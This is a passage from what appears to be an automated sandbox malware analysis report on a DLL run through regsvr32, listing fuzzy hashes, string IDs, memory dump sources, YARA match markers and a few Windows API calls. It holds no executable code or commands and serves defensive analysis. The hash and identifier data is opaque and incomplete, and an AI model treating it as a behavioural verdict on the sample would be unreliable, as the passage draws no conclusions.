• Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
• Instruction Fuzzy Hash: 5C51AE66A5868341EA609B22A4513BBB3D0FF85BA0F488031EE4D47AF9DE3CE015C702
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: V$@$P9$^_"
• API String ID: 0-1880944046
• Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
• Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
• Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
• Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: InfoLocale_getptd
• String ID: Qr2_:g
• API String ID: 3731964398-1052752507
• Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
• Instruction ID: eb8f72c5ec5ae4cdd7c629bdc8fed0f8ab087dfd9e14d897fc7d813d2264d0e8
• Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
• Instruction Fuzzy Hash: FC215572B08A8396EB689B25D9453EAB3E0FB88755F004136C61D876F6DF3CE4648602
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: =_$F)k$b/$syG
• API String ID: 0-3955183656
• Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
• Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
• Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
• Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: InfoLocale_getptd
• String ID: Qr2_:g
• API String ID: 3731964398-1052752507
• Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
• Instruction ID: 1a67a88e49e39608d2523ae2b64075dbbc4af42f2bff78665340f16aa0195614
• Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
• Instruction Fuzzy Hash: F1216A72B08A8396EB289B60E4457A973A1FB88B90F444135DA5D873B4CF3CE554C701
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$'Xsa$iJ6$vG
• API String ID: 0-746338152
• Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
• Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
• Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
• Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: *i^$MIC$-Z$]2
• API String ID: 0-498664264
• Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
• Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
• Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
• Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: >97"$?$LsRW$~x
• API String ID: 0-2554301858
• Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
• Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
• Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
• Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                • API String ID: 0-784369960
                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: -`G$.$5B.Y$Z`35
• API String ID: 0-1363032466
• Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
• Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
• Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
• Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: *+_$WSh$\O$#o
• API String ID: 0-1846314129
• Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
• Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
• Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
• Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: .B$O$M*K$\<
• API String ID: 0-3225238681
• Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
• Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
• Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
• Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: $$$$xVO$~O
• API String ID: 0-3655128719
• Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
• Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
• Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
• Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,IW$G$JMg$l
• API String ID: 0-1370644289
• Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
• Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
• Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
• Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$__tzset
• String ID:
• API String ID: 3587134695-0
• Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
• Instruction ID: c2e953564bb6a9f8f86d72378632da2607e5de8317861490c97149c2f908be65
• Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
• Instruction Fuzzy Hash: F5026F32A0C683C6E7688F6990A423D37E1EB85791F64C03AD74E466F6CE38E644C702
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$DecodePointer_lock
• String ID:
• API String ID: 2175075375-0
• Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
• Instruction ID: 049ee773d5a9964a21122cb141c2fd9abbf0c3d48f73140f68a398248d163e66
• Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
• Instruction Fuzzy Hash: 1F31AD21F0C75342FB659A65A66637A71E6AF543F4F148035EE4D87EF6EE2CE8008702
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9D357
• SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB9D39D
• UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB9D3A8
  • Part of subcall function 00007FFFEFB96F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB96FCF
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
• String ID:
• API String ID: 2731829486-0
• Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
• Instruction ID: 1fa25ca43c33d7ca554b09cecd606ac0890057683c955af8dcef849847ed6f12
• Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
• Instruction Fuzzy Hash: 8A114C25A2CA8782E7259B51E8543BA73E6FF85324F440139EA8D02AF5DF3DE404CB02
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: *4$5F$S^r
• API String ID: 0-3556444313
• Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
• Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
• Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
• Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: &lz2$'~W$<x<
• API String ID: 0-2268522332
• Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
• Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
• Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
• Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: o6.$s8Q${Fl&
• API String ID: 0-2665016659
• Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
• Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
• Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
• Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: $$T]0$ba^2
• API String ID: 0-1276948933
• Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
• Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
• Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
• Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6w5*$EDO$V
                                                                                                                                • API String ID: 0-1640223502
                                                                                                                                • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                                                                                • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Y()$i_"o$|Y
                                                                                                                                • API String ID: 0-942011364
                                                                                                                                • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                                                                                • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: O)$,G$-
                                                                                                                                • API String ID: 0-23008916
                                                                                                                                • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                                                                                • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ;U[$L$Q#
                                                                                                                                • API String ID: 0-2933747092
                                                                                                                                • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                                                                                • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5($<:*$qwX
                                                                                                                                • API String ID: 0-3944236288
                                                                                                                                • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                                                                                • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 79&$s`~$v;
                                                                                                                                • API String ID: 0-3844292866
                                                                                                                                • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                                                                                • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: wQ_$1_$ac
                                                                                                                                • API String ID: 0-1037425278
                                                                                                                                • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                                                                                • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )K$U|$|1-
                                                                                                                                • API String ID: 0-2543966960
                                                                                                                                • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                                                                                • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6|$6`d$H~z
                                                                                                                                • API String ID: 0-1702722476
                                                                                                                                • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                                                                                • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
